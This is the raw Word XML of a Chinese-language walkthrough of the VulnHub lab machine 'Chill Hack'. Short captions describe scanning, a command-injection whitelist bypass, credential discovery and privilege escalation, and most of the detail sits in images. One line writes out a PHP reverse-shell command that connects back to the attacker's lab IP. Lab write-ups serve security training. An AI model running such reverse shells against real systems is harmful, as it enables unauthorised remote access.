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53391" w14:textId="6311D4C1" w:rsidR="000C412A" w:rsidRDefault="00E27D2D">
      <w:r w:rsidRPr="00E27D2D">
        <w:t>Chill_Hack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E321A0" w14:textId="77777777" w:rsidR="003626A7" w:rsidRDefault="003626A7"/>
    <w:p w14:paraId="5F532B50" w14:textId="44644620" w:rsidR="00E27D2D" w:rsidRDefault="00E27D2D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载地址：</w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="ae"/>
          </w:rPr>
          <w:t>Chill Hack: 1 ~ VulnHub</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2819E42C" w14:textId="77777777" w:rsidR="00E27D2D" w:rsidRDefault="00E27D2D"/>
    <w:p w14:paraId="0AEC6D17" w14:textId="74DCAC9C" w:rsidR="00E27D2D" w:rsidRDefault="00E27D2D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机发现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F06A1FC" w14:textId="22F50A39" w:rsidR="00E27D2D" w:rsidRDefault="00E27D2D">
      <w:r w:rsidRPr="00E27D2D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D9604F9" wp14:editId="60C05052">
            <wp:extent cx="5274310" cy="2813685"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="1055227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27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0940" w14:textId="189FE10E" w:rsidR="00E27D2D" w:rsidRDefault="00E27D2D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目标1</w:t>
      </w:r>
      <w:r>
        <w:t>76</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFC2AA3" w14:textId="016291A7" w:rsidR="00E27D2D" w:rsidRDefault="00E27D2D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3DF7D2" w14:textId="535B5EA8" w:rsidR="00E27D2D" w:rsidRDefault="00E27D2D">
      <w:r w:rsidRPr="00E27D2D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="734B4824" wp14:editId="3C60B801">
            <wp:extent cx="5274310" cy="1988185"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="64058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9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34A2" w14:textId="3C59BF39" w:rsidR="00E27D2D" w:rsidRDefault="00E27D2D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446FB513" w14:textId="012E38DD" w:rsidR="00E27D2D" w:rsidRDefault="00E27D2D">
      <w:r w:rsidRPr="00E27D2D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65482B42" wp14:editId="2791F88D">
            <wp:extent cx="5274310" cy="2249170"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="357647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7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46D5" w14:textId="5FA28D45" w:rsidR="00E27D2D" w:rsidRDefault="00A62E8F">
      <w:r w:rsidRPr="00A62E8F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A127212" wp14:editId="63BB3A37">
            <wp:extent cx="5274310" cy="2726690"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="150157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77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DDA5" w14:textId="65AA881C" w:rsidR="003626A7" w:rsidRDefault="003626A7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接去看web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDCB484" w14:textId="1EDC7235" w:rsidR="003626A7" w:rsidRDefault="003626A7">
      <w:r w:rsidRPr="003626A7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A162F8D" wp14:editId="50540DFC">
            <wp:extent cx="5274310" cy="3387725"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="142750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04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2C29" w14:textId="284F5ED0" w:rsidR="003626A7" w:rsidRDefault="003626A7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>先扫一下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175872F8" w14:textId="20C8F8E8" w:rsidR="003626A7" w:rsidRDefault="003626A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003626A7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59019FCA" wp14:editId="7F25C30B">
            <wp:extent cx="5274310" cy="2238375"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="5429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9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89F" w14:textId="34824632" w:rsidR="003626A7" w:rsidRDefault="003626A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有几个有点问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F3D295" w14:textId="3FCA5ADB" w:rsidR="003626A7" w:rsidRDefault="003626A7">
      <w:r w:rsidRPr="003626A7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="510C49EA" wp14:editId="5F7C855A">
            <wp:extent cx="4404742" cy="1341236"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1811705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5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60D5" w14:textId="0AA64080" w:rsidR="003626A7" w:rsidRDefault="003626A7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看着好像命令执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097CB670" w14:textId="0F7D4214" w:rsidR="003626A7" w:rsidRDefault="003626A7">
      <w:r w:rsidRPr="003626A7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="535CB6EE" wp14:editId="44B03200">
            <wp:extent cx="5274310" cy="3394075"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1496719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9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5BCF" w14:textId="0AE966D8" w:rsidR="003626A7" w:rsidRDefault="003626A7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看来没错直接反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275A7BF1" w14:textId="5C538CCA" w:rsidR="003626A7" w:rsidRDefault="003626A7">
      <w:r w:rsidRPr="003626A7">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C4CFD40" wp14:editId="32D819B2">
            <wp:extent cx="5274310" cy="3336290"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="210780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09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9AD6" w14:textId="0A01FFF8" w:rsidR="003626A7" w:rsidRDefault="003626A7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还有还白名单？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BED2FA9" w14:textId="3E9144D2" w:rsidR="003626A7" w:rsidRDefault="001B0764">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bash也不能用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CA2650" w14:textId="7EB9298A" w:rsidR="001B0764" w:rsidRDefault="001B0764">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那就用php吧</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0C041B" w14:textId="7489B4DB" w:rsidR="001B0764" w:rsidRDefault="001B0764">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B0764">
        <w:t>whoami|php -r '$sock=fsockopen("192.168.21.131",666);exec("bash &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77576154" w14:textId="427EF94F" w:rsidR="001B0764" w:rsidRDefault="001B0764">
      <w:r w:rsidRPr="001B0764">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C2F361A" wp14:editId="5A3B3439">
            <wp:extent cx="5265876" cy="1607959"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2107782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2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319C" w14:textId="7F973721" w:rsidR="001B0764" w:rsidRDefault="001B0764">
      <w:r w:rsidRPr="001B0764">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="672AFAAD" wp14:editId="76DFAB44">
            <wp:extent cx="1097375" cy="594412"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="279929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9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F418" w14:textId="5BDA9C60" w:rsidR="001B0764" w:rsidRDefault="001B0764">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搞定接下来就是提权了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B3EFE8" w14:textId="51254E87" w:rsidR="001B0764" w:rsidRDefault="001B0764">
      <w:r w:rsidRPr="001B0764">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F42766C" wp14:editId="58900E08">
            <wp:extent cx="5274310" cy="955040"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="931355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55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C71B" w14:textId="66E1F79A" w:rsidR="001B0764" w:rsidRDefault="001B0764">
      <w:r w:rsidRPr="001B0764">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05E4C1BD" wp14:editId="33E92DA0">
            <wp:extent cx="4915326" cy="2575783"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1262626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26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E30B" w14:textId="056E934F" w:rsidR="001B0764" w:rsidRDefault="001B0764">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有python吧shell弄一下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A762129" w14:textId="76D380B4" w:rsidR="001B0764" w:rsidRDefault="001B0764">
      <w:r w:rsidRPr="001B0764">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AFD71A7" wp14:editId="57FDDBAC">
            <wp:extent cx="4160881" cy="457240"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="73300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2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FF8" w14:textId="51FE6B00" w:rsidR="001B0764" w:rsidRDefault="001B0764">
      <w:r w:rsidRPr="001B0764">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="285BADAD" wp14:editId="45F34C45">
            <wp:extent cx="5274310" cy="1341755"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="31204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44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EAEA" w14:textId="3936D2C7" w:rsidR="001B0764" w:rsidRDefault="001B0764">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>刚才代码的源码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B6B8F7" w14:textId="6924555B" w:rsidR="001B0764" w:rsidRDefault="00082532">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来就是看看文件了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318EA369" w14:textId="597A07DC" w:rsidR="00082532" w:rsidRDefault="00082532">
      <w:r w:rsidRPr="00082532">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="398C60A8" wp14:editId="2FCA3E16">
            <wp:extent cx="5274310" cy="660400"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="904331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31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8F51" w14:textId="5C3F25FD" w:rsidR="00082532" w:rsidRDefault="00082532">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>翻到咯</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23545E0D" w14:textId="369A6001" w:rsidR="00082532" w:rsidRDefault="00082532">
      <w:r w:rsidRPr="00082532">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B61E7D8" wp14:editId="410714CA">
            <wp:extent cx="5274310" cy="2981325"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="1529552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2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BD15" w14:textId="31C3E4B8" w:rsidR="00082532" w:rsidRDefault="00082532">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里面提示我们去看看images</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D2A456" w14:textId="505C7C6C" w:rsidR="00082532" w:rsidRDefault="00082532">
      <w:r w:rsidRPr="00082532">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="071E1A19" wp14:editId="3A5685EF">
            <wp:extent cx="5274310" cy="502285"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1331333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33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D174" w14:textId="0821F20F" w:rsidR="00082532" w:rsidRDefault="00082532">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看看jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CCB6E8" w14:textId="22DC3296" w:rsidR="00082532" w:rsidRDefault="00082532">
      <w:r w:rsidRPr="00082532">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="748D59EA" wp14:editId="6DBF5367">
            <wp:extent cx="4915326" cy="701101"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1018761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61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8CC" w14:textId="05099A49" w:rsidR="00082532" w:rsidRDefault="00082532">
      <w:r w:rsidRPr="00082532">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C7090F9" wp14:editId="4FDFFF28">
            <wp:extent cx="5274310" cy="1090930"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="31894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430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3CD" w14:textId="29AA369A" w:rsidR="00082532" w:rsidRDefault="00082532">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先用工具简单看看</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73509913" w14:textId="4EC18BD7" w:rsidR="00082532" w:rsidRDefault="00082532">
      <w:r w:rsidRPr="00082532">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="721E9DC1" wp14:editId="3A904842">
            <wp:extent cx="5274310" cy="1070610"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1511196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969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E189" w14:textId="0CF993DE" w:rsidR="00082532" w:rsidRDefault="00082532">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>啥都没有？我不信</w:t>
      </w:r>
      <w:r w:rsidR="008D3286">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，换工具</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACB4EE9" w14:textId="4D248594" w:rsidR="008D3286" w:rsidRDefault="008D3286">
      <w:r w:rsidRPr="008D3286">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D256545" wp14:editId="6EAACE1F">
            <wp:extent cx="5022015" cy="861135"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="143881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12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010C" w14:textId="32B20CD7" w:rsidR="008D3286" w:rsidRDefault="008D3286">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3286">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73A358F6" wp14:editId="5C98D2CC">
            <wp:extent cx="4640982" cy="1325995"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="733088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8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6ABF" w14:textId="15E2CB2C" w:rsidR="00082532" w:rsidRDefault="008D3286">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码爆破（这个方法最快）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5932B675" w14:textId="1911EB3B" w:rsidR="008D3286" w:rsidRDefault="008D3286">
      <w:r w:rsidRPr="008D3286">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F79F67F" wp14:editId="03265AEA">
            <wp:extent cx="5274310" cy="429260"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="1451137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37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9F4" w14:textId="0DE223E7" w:rsidR="008D3286" w:rsidRDefault="008D3286">
      <w:r w:rsidRPr="008D3286">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37881DE6" wp14:editId="57353F0E">
            <wp:extent cx="5274310" cy="1223645"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1202591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14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4E4A" w14:textId="27BA91AA" w:rsidR="008D3286" w:rsidRDefault="008D3286">
      <w:r w:rsidRPr="008D3286">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B72EC97" wp14:editId="42EB41C9">
            <wp:extent cx="2888230" cy="975445"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="1681227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76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2074" w14:textId="1A64257D" w:rsidR="008D3286" w:rsidRDefault="008D3286">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看看文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6269FE70" w14:textId="5E406DB1" w:rsidR="008D3286" w:rsidRDefault="008D3286">
      <w:r w:rsidRPr="008D3286">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68BD0A72" wp14:editId="3C7B8754">
            <wp:extent cx="5274310" cy="5373370"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1272719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195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071" w14:textId="343CCA24" w:rsidR="008D3286" w:rsidRDefault="008D3286">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>审计就完了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A13CF7" w14:textId="2CE67B3E" w:rsidR="008D3286" w:rsidRDefault="006007F3">
      <w:r w:rsidRPr="006007F3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2112BA30" wp14:editId="52C29CA4">
            <wp:extent cx="5274310" cy="1615440"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="4348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E84E" w14:textId="0B83A3B7" w:rsidR="006007F3" w:rsidRDefault="006007F3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>好好好密码写代码里面狠</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FCD317" w14:textId="0AA2FFEB" w:rsidR="006007F3" w:rsidRDefault="006007F3">
      <w:r w:rsidRPr="006007F3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A4094AB" wp14:editId="0A943ABB">
            <wp:extent cx="4503810" cy="723963"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1898847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47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967A" w14:textId="6FE0711C" w:rsidR="006007F3" w:rsidRDefault="006007F3" w:rsidP="006007F3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码到手剩下用户名了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A8CC00" w14:textId="24768B20" w:rsidR="006007F3" w:rsidRDefault="006007F3" w:rsidP="006007F3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>看到有ftp去看看，说不定有匿名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783F0AE1" w14:textId="7B4BC748" w:rsidR="006007F3" w:rsidRDefault="006007F3" w:rsidP="006007F3">
      <w:r w:rsidRPr="006007F3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="252921CC" wp14:editId="478EBA43">
            <wp:extent cx="5274310" cy="1893570"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="294232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325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BAC7" w14:textId="3A7444EC" w:rsidR="006007F3" w:rsidRDefault="006007F3" w:rsidP="006007F3">
      <w:r w:rsidRPr="006007F3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1984D6D2" wp14:editId="4877BD7F">
            <wp:extent cx="5274310" cy="454660"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="933053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53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8ED2" w14:textId="79BD1382" w:rsidR="006007F3" w:rsidRDefault="006007F3" w:rsidP="006007F3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>额啥也不是直接用户名算了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E26100F" w14:textId="004D179C" w:rsidR="006007F3" w:rsidRDefault="006007F3" w:rsidP="006007F3">
      <w:r w:rsidRPr="006007F3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="288F65DC" wp14:editId="20436684">
            <wp:extent cx="2766300" cy="746825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="973070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08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255E" w14:textId="11E52D7F" w:rsidR="006007F3" w:rsidRDefault="006007F3" w:rsidP="006007F3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就这三名试试就行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008A9AB3" w14:textId="69295175" w:rsidR="006007F3" w:rsidRDefault="006007F3" w:rsidP="006007F3">
      <w:r w:rsidRPr="006007F3">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7126E8BE" wp14:editId="2AB67965">
            <wp:extent cx="5274310" cy="5230495"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="1319338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85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63C6" w14:textId="214E8315" w:rsidR="006007F3" w:rsidRDefault="006007F3" w:rsidP="006007F3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>好第一个就进去了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284720BC" w14:textId="6E465619" w:rsidR="006007F3" w:rsidRDefault="006007F3" w:rsidP="006007F3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来就是提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C8A510" w14:textId="31AD95F4" w:rsidR="006007F3" w:rsidRDefault="006007F3" w:rsidP="006007F3">
      <w:r w:rsidRPr="006007F3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B5E90DF" wp14:editId="414C119D">
            <wp:extent cx="5274310" cy="654050"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="378891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16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04C4" w14:textId="076BFCC6" w:rsidR="006007F3" w:rsidRDefault="006007F3" w:rsidP="006007F3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找一下能用该账户读取的文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E3184D" w14:textId="707C3A46" w:rsidR="006007F3" w:rsidRDefault="002068C1" w:rsidP="006007F3">
      <w:r w:rsidRPr="002068C1">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68D47AE0" wp14:editId="3A7ACF7F">
            <wp:extent cx="3970364" cy="2248095"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1473601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1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A561" w14:textId="5FEF426A" w:rsidR="002068C1" w:rsidRDefault="002068C1" w:rsidP="006007F3">
      <w:r w:rsidRPr="002068C1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78D3D284" wp14:editId="5BF602C0">
            <wp:extent cx="5274310" cy="295275"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="486031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312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5FF3" w14:textId="64CD3A92" w:rsidR="002068C1" w:rsidRDefault="002068C1" w:rsidP="006007F3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这边挺想看local的用点操作看一下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD83FDA" w14:textId="729A4EFB" w:rsidR="002068C1" w:rsidRDefault="002068C1" w:rsidP="006007F3">
      <w:r w:rsidRPr="002068C1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24D4D963" wp14:editId="14A47B84">
            <wp:extent cx="5037257" cy="1325995"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="44692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257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9E2D" w14:textId="7F606E17" w:rsidR="002068C1" w:rsidRDefault="002068C1" w:rsidP="006007F3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>试试这个脚本会不会有问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242E0791" w14:textId="0B57E158" w:rsidR="002068C1" w:rsidRDefault="002068C1" w:rsidP="006007F3">
      <w:r w:rsidRPr="002068C1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="456CAA8F" wp14:editId="78A2BC94">
            <wp:extent cx="5274310" cy="1591945"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="2066721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212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A84E" w14:textId="14BABD4C" w:rsidR="002068C1" w:rsidRDefault="002068C1" w:rsidP="006007F3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不回显能执行命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D22A083" w14:textId="734D3451" w:rsidR="002068C1" w:rsidRDefault="002068C1" w:rsidP="006007F3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D41ADDC" w14:textId="16EAA66A" w:rsidR="002068C1" w:rsidRDefault="002068C1" w:rsidP="006007F3">
      <w:r w:rsidRPr="002068C1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42FEE3C2" wp14:editId="47746C9B">
            <wp:extent cx="4854361" cy="1425063"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="1919443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431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9EE9" w14:textId="73182C76" w:rsidR="002068C1" w:rsidRDefault="002068C1" w:rsidP="006007F3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF3C254" w14:textId="6D7A490E" w:rsidR="002068C1" w:rsidRDefault="00EB7EE5" w:rsidP="006007F3">
      <w:r w:rsidRPr="00EB7EE5">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0751A0B1" wp14:editId="264D8B20">
            <wp:extent cx="5274310" cy="559435"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1937227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71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C36" w14:textId="562E8773" w:rsidR="00EB7EE5" w:rsidRDefault="00EB7EE5" w:rsidP="006007F3">
      <w:r w:rsidRPr="00EB7EE5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="520F20C4" wp14:editId="74CF306D">
            <wp:extent cx="5274310" cy="405765"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
